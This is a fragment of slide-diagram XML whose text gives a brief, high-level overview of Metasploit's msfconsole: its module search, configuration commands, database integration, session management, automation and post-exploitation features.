      <dgm:prSet presAssocID="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" type="pres">
      <dgm:prSet presAssocID="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{647555A2-F76C-8446-8D8B-3077002279DC}" type="pres">
      <dgm:prSet presAssocID="{930CC149-9111-47AC-A41E-F89FB232510B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" type="pres">
      <dgm:prSet presAssocID="{2BF837AF-0125-4742-9B70-627991CFBE1D}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B245C06C-2BE0-5B4A-9544-217DFD56A9DB}" type="pres">
      <dgm:prSet presAssocID="{5453956D-5682-4FE2-8F29-6028FCF32323}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" type="pres">
      <dgm:prSet presAssocID="{C8A1B580-0DBB-484B-B503-903BA19CC479}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88C4F0EF-BB99-F54B-810F-65BB55F78E5C}" type="pres">
      <dgm:prSet presAssocID="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" type="pres">
      <dgm:prSet presAssocID="{D25FE60C-533D-485D-968F-9D566DD82DC1}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB3FAA97-954A-CE4F-86A6-4D5AC10B6B08}" type="pres">
      <dgm:prSet presAssocID="{3A972533-9860-46BA-A252-11BC830C760C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}" type="pres">
      <dgm:prSet presAssocID="{23C471B6-4934-4584-A1E1-85E7C19CC642}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C6D0BF0E-5797-AA4A-874F-BFB3A95CC3A2}" type="presOf" srcId="{D25FE60C-533D-485D-968F-9D566DD82DC1}" destId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{23C471B6-4934-4584-A1E1-85E7C19CC642}" srcOrd="6" destOrd="0" parTransId="{C0E488F4-EEC9-43B9-94E0-15498A51E92E}" sibTransId="{B70102CF-D4D3-4AA9-9501-B4423E2F5C4F}"/>
    <dgm:cxn modelId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{C8A1B580-0DBB-484B-B503-903BA19CC479}" srcOrd="4" destOrd="0" parTransId="{83701141-22FF-41F0-8673-D1F4844FBE6C}" sibTransId="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}"/>
    <dgm:cxn modelId="{631C8641-2B8B-CE46-A50C-2A7270B7AC90}" type="presOf" srcId="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" destId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8BA3A668-DBF7-6D4C-8E05-E5B1A6B98B17}" type="presOf" srcId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" destId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{11B54B6B-B760-1D47-8167-8E701B890030}" type="presOf" srcId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" destId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" srcOrd="2" destOrd="0" parTransId="{9E788F8C-7BC0-40CD-BF00-472DF3C8A0FA}" sibTransId="{930CC149-9111-47AC-A41E-F89FB232510B}"/>
    <dgm:cxn modelId="{566CE68D-94A0-A346-9133-3D9EDB39EECC}" type="presOf" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{54F19795-76B8-412A-A82B-0215F36F188E}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" srcOrd="1" destOrd="0" parTransId="{6AA2552D-4818-4A32-B611-E8C7A1DC1C08}" sibTransId="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}"/>
    <dgm:cxn modelId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" srcOrd="0" destOrd="0" parTransId="{ED87C256-AB52-4214-AE9D-3A976F2387C0}" sibTransId="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}"/>
    <dgm:cxn modelId="{087B4AB6-9AF6-2440-AE09-3B20DEC8DAAD}" type="presOf" srcId="{2BF837AF-0125-4742-9B70-627991CFBE1D}" destId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{2BF837AF-0125-4742-9B70-627991CFBE1D}" srcOrd="3" destOrd="0" parTransId="{7591A036-7101-4364-9058-998790E61839}" sibTransId="{5453956D-5682-4FE2-8F29-6028FCF32323}"/>
    <dgm:cxn modelId="{7ABF5FC5-8D04-404C-8F76-2FA8D1DCAC6C}" type="presOf" srcId="{C8A1B580-0DBB-484B-B503-903BA19CC479}" destId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C0FD74CB-4745-FA4E-8AD3-9EC0B25A286A}" type="presOf" srcId="{23C471B6-4934-4584-A1E1-85E7C19CC642}" destId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{D25FE60C-533D-485D-968F-9D566DD82DC1}" srcOrd="5" destOrd="0" parTransId="{EB711B7C-689F-4BD5-BA18-B3B9A4043182}" sibTransId="{3A972533-9860-46BA-A252-11BC830C760C}"/>
    <dgm:cxn modelId="{89494452-FEAA-5B42-B88B-B4EA5D2DF7FA}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C11845A7-5A2E-D34D-81FF-D44FF7C76A4A}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{9D037208-36ED-604E-B425-686286831FD4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7D1F1FE3-070D-DB43-A85F-1E593E2D9204}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DA5D5CD7-BBC2-CC4D-88CE-A03F3B0A82B4}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{7D7B6C12-9A3F-BB45-B73A-9E976B760B27}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F7A1B189-9EA8-8F46-9B0B-F2782DA88FE7}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1698E763-A828-E048-B8F2-0490A466398B}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{647555A2-F76C-8446-8D8B-3077002279DC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{92EFF8D1-EAB0-1F48-A1B4-69329AD8E0CC}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8113D41A-F738-EE4C-9FCA-FEE90A6F3ED9}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{B245C06C-2BE0-5B4A-9544-217DFD56A9DB}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3876FC27-4752-AE4A-8BEF-D7D5687183DE}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{04AC7913-6482-114C-A354-59C1B9CA006F}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{88C4F0EF-BB99-F54B-810F-65BB55F78E5C}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{19E8740E-F23E-DB4D-A7FF-C13F465968C2}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D797849E-CCB8-4B42-ACDB-F380AEEE4473}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{CB3FAA97-954A-CE4F-86A6-4D5AC10B6B08}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{79C6E7E5-BBCD-5644-B569-2C0D215E5601}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577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230AB5E-98E2-4585-803E-50D16823B0C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0FC8B94-6406-43DA-8545-14F64A1109C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>What is msfconsole?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55ED4718-92B7-41D5-8612-70F9F189112A}" type="parTrans" cxnId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}" type="sibTrans" cxnId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBF0D456-0B68-4167-8FFB-778D95180561}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>msfconsole is the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>main command-line interface</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> of the Metasploit Framework, a powerful penetration testing tool used by cybersecurity professionals and ethical hackers. It provides a flexible and powerful environment to search, configure, and execute exploits, payloads, auxiliary modules, and more.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D49E934B-6AB8-4D09-9C29-E58DB492A185}" type="parTrans" cxnId="{19D41640-1C4D-49E9-AC15-B75D53447678}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}" type="sibTrans" cxnId="{19D41640-1C4D-49E9-AC15-B75D53447678}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Key Features of msfconsole:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{914E4AB3-8655-4EC0-89A1-FE6EF819468E}" type="parTrans" cxnId="{32EE81A9-58F0-4143-9869-CDD501E28D35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B9DB058-2E92-490C-9B98-EE2380921D98}" type="sibTrans" cxnId="{32EE81A9-58F0-4143-9869-CDD501E28D35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔍 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Module Search</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Quickly find exploits, payloads, post-exploitation tools, and scanners using search.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{439380C8-F211-4D05-BC14-FB919C96605B}" type="parTrans" cxnId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}" type="sibTrans" cxnId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🛠️ </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Module Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Use use &lt;module&gt;, set &lt;option&gt;, and show options to configure attacks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7D4AAA4-FF45-4A38-BB4A-714EB16B317A}" type="parTrans" cxnId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBB62151-AE15-4513-9A55-FB51756C149D}" type="sibTrans" cxnId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🧠 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Database Integration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Integrate with a PostgreSQL database to store data from scans and sessions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8BA4D85-218D-40F8-A643-7832F43B298B}" type="parTrans" cxnId="{C91F984E-4E98-479B-A413-D19684C43D5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}" type="sibTrans" cxnId="{C91F984E-4E98-479B-A413-D19684C43D5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔄 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Session Management</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Interact with compromised systems using sessions command.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{455C87E0-8F98-4942-9B98-1791B4E41FB2}" type="parTrans" cxnId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F78497DE-2462-4D37-A436-C6086E62DE8F}" type="sibTrans" cxnId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🧩 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Automation Support</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Scripts and resource files (.rc) can automate complex workflows.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{168BEF23-7252-4215-BBED-2C6C17AC47EF}" type="parTrans" cxnId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56188926-022A-4067-B1F7-240AD894B82C}" type="sibTrans" cxnId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>📊 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Info Gathering</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Run auxiliary modules like scanners or fuzzers to gather information before exploitation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{357AB8E8-642D-4542-8EC1-5E62361DA60F}" type="parTrans" cxnId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}" type="sibTrans" cxnId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔐 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: After gaining access, use post modules to gather more data or maintain access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43486210-9AF2-4442-93FD-A878C7809F33}" type="parTrans" cxnId="{169A0A0C-3844-4F62-99F1-708CB97F4CF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51FA9D35-BF46-4B99-B13C-5F7172EE6D02}" type="sibTrans" cxnId="{169A0A0C-3844-4F62-99F1-708CB97F4CF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" type="pres">
      <dgm:prSet presAssocID="{B230AB5E-98E2-4585-803E-50D16823B0C6}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" type="pres">
      <dgm:prSet presAssocID="{60FC8B94-6406-43DA-8545-14F64A1109C3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AA043137-B605-294B-8A2D-5CA20139CADF}" type="pres">
      <dgm:prSet presAssocID="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" type="pres">
      <dgm:prSet presAssocID="{BBF0D456-0B68-4167-8FFB-778D95180561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5A868245-F14B-5942-A0BE-AF0124103AF6}" type="pres">
      <dgm:prSet presAssocID="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" type="pres">
      <dgm:prSet presAssocID="{63BC1EA3-3DAE-43A5-8D30-F781417713F5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21E27B0D-6E9B-3041-9338-59CD3D96B730}" type="pres">
      <dgm:prSet presAssocID="{9B9DB058-2E92-490C-9B98-EE2380921D98}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" type="pres">
      <dgm:prSet presAssocID="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04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02E34676-2C53-A24E-946F-5D727EB8332B}" type="pres">
      <dgm:prSet presAssocID="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" type="pres">
      <dgm:prSet presAssocID="{F8340262-EF82-43E5-94C6-2DF400EE6A33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EF163A10-3A52-FA4D-8A4A-7B8AD74423BD}" type="pres">
      <dgm:prSet presAssocID="{DBB62151-AE15-4513-9A55-FB51756C149D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" type="pres">
      <dgm:prSet presAssocID="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8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B0384050-5C8F-2442-870D-AC9C2372E49C}" type="pres">
      <dgm:prSet presAssocID="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
